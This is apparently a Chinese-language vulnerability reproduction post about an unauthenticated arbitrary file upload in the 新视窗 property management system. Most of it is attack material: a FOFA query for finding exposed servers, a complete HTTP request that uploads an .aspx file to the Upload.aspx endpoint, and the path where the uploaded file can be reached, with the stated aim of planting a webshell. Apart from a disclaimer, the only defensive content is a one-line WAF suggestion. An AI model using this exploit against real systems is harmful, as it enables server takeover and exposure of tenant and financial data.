新视窗新一代物业管理系统任意文件上传漏洞

漏洞复现

新视窗新一代物业管理系统任意文件上传漏洞

前言

        新视窗新一代物业管理系统该系统涵盖了物业管理全流程,包括客户服务、业户管理、报事报修、设施设备管理、财务管理等功能,具有灵活的多组织架构,可以满足不同规模物业公司的需求。该系统某接口对上传的文件校验逻辑存在缺陷,导致攻击者可以上传webshell文件到服务器,进而可以getshell。

声明:文章中涉及的内容可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

FOFA语法

1
body="BPMSite/ClientSupport/OCXInstall.aspx"

image

漏洞复现

直接未授权访问接口进行上传文件

image

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST /OfficeManagement/RegisterManager/Upload.aspx HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Cookie: JSESSIONID=FC2204F3698D2A07CDE9786055A071CB
Content-Type: multipart/form-data; boundary=00content0boundary00
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 146
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="file"; filename="1.aspx"
Content-Type: image/jpg

GIF89a
123
--00content0boundary00--

访问路径

1
/Upload/ContractMamager/71d52920be4d-4956-93f9-77c3b0c899e81.aspx

image

修复建议

配置WAF针对该URI进行特定数据包内容匹配后拦截